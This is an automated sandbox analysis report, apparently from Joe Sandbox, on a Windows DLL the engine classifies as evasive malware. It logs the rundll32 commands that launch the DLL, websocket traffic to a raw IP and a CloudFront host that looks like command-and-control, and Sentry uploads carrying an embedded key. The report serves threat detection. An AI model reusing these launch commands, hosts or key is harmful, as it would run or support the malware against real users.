    Source: Binary string: ile":"kernelbase.pdb source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fastprox.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdbM Win32_Fan: source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rasadhlp.pdbcurityToolsR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp

    Networking

    Source: C:\Windows\System32\rundll32.exe Network Connect: 34.120.62.213 443
    Source: C:\Windows\System32\rundll32.exe Network Connect: 195.133.1.117 80
    Source: C:\Windows\System32\rundll32.exe Network Connect: 13.227.9.174 80
    Source: C:\Windows\System32\rundll32.exe Network Connect: 13.227.9.48 80
    Source: global traffic HTTP traffic detected: POST /api/4508128821837904/envelope/ HTTP/1.1 x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0 accept: */* host: o4508128816857088.ingest.de.sentry.io content-length: 11418
    Source: global traffic HTTP traffic detected: POST /api/4508128821837904/envelope/ HTTP/1.1 x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0 accept: */* host: o4508128816857088.ingest.de.sentry.io content-length: 12516
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: hYIl3tcxOdFjfsPRnTVigw==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: 4o/S/DnI/xUOQ7/tWSDOmw==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: mm3wcIuOeiJHtLi7cs4F3g==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: RNaQVJ0zTL1uqG8J1zu+SQ==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: gJK8B/FHxxJOrYPc07zPdA==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: 3I3wooedh91j3GxPYkeArw==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: JApRj8zYZyC8oZg2we4Azg==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: MG/uZPS22IGDcq20LYVyjA==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: /G1bGErhqg3xJ3/YMCdIKA==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: o9P6bbQkBpkHJSDprgi2YQ==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: MG/wcOLqwZyraIHV6mN2eA==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: enC0Es7mdVSw6GUwznNaLQ==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: YZ6gImeX26KgQbaMt7jJTg==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: mgtSMK+F6GzpGcK4RpjtGQ==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: 195.133.1.117 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: 1W7A8pWbhZreG2T6Et2+aw==
    Source: global traffic HTTP traffic detected: GET /ws HTTP/1.1 Host: d2np1vqkcxhde6.cloudfront.net Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: 3bAo+RHHQYr0rCo3Cvgr5g==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: RWInDnK7aInVBvxdqgFRfw==
    Source: Joe Sandbox ViewASN Name: MTW-ASRU MTW-ASRU
    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: global trafficDNS traffic detected: DNS query: d2np1vqkcxhde6.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: o4508128816857088.ingest.de.sentry.io
    Source: unknownHTTP traffic detected: POST /api/4508128821837904/envelope/ HTTP/1.1x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0accept: */*host: o4508128816857088.ingest.de.sentry.iocontent-length: 11418
    Source: 8N8j6QojHn.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: 8N8j6QojHn.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
    Source: 8N8j6QojHn.dllString found in binary or memory: http://ocsp.digicert.com0C
    Source: 8N8j6QojHn.dllString found in binary or memory: http://ocsp.digicert.com0N
    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
    Source: 8N8j6QojHn.dllString found in binary or memory: http://www.digicert.com/CPS0
    Source: rundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dllString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
    Source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00BB000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521988705.0000025BF009D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461769420.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.sentry.io/product/accounts/quotas/
    Source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE1F8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/
    Source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/Se
    Source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/d
    Source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/dll
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e.mui?
    Source: 8N8j6QojHn.dllString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownHTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49933 version: TLS 1.2
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465D8D06_2_00007FFD9465D8D0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465A0B06_2_00007FFD9465A0B0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD946596B06_2_00007FFD946596B0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD944D62906_2_00007FFD944D6290
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9466ED406_2_00007FFD9466ED40
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9464D5006_2_00007FFD9464D500
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD944B25B06_2_00007FFD944B25B0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9464FFC06_2_00007FFD9464FFC0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD944B1DA06_2_00007FFD944B1DA0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD943A19E06_2_00007FFD943A19E0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9466F7F06_2_00007FFD9466F7F0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465D1E06_2_00007FFD9465D1E0
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5860 -s 428
    Source: 8N8j6QojHn.dllBinary string: \Device\Afd\Mio
    Source: 8N8j6QojHn.dllBinary string: Failed to open \Device\Afd\Mio: h
    Source: classification engineClassification label: mal96.evad.winDLL@22/9@3/5
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6728
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5860
    Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\93e4e027-6f7d-4e39-8bd3-3c31d2ebd916
    Source: 8N8j6QojHn.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain
    Source: 8N8j6QojHn.dllReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\8N8j6QojHn.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMain
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_path
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMain
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMain
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_path
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6728 -s 428
    Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\loaddll64.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\loaddll64.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\loaddll64.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: 8N8j6QojHn.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: 8N8j6QojHn.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: 8N8j6QojHn.dllStatic file information: File size 3645790 > 1048576
    Source: 8N8j6QojHn.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2db200
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 8N8j6QojHn.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: sspicli.pdbecurityToolsz source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbut source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"Z source: rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mswsock.pdbDSut source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: win32u.pdbexeName8# source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdb source: rundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dll
    Source: Binary string: tdll.pdb"},{"type":"a source: rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: userenv.pdbEksize source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
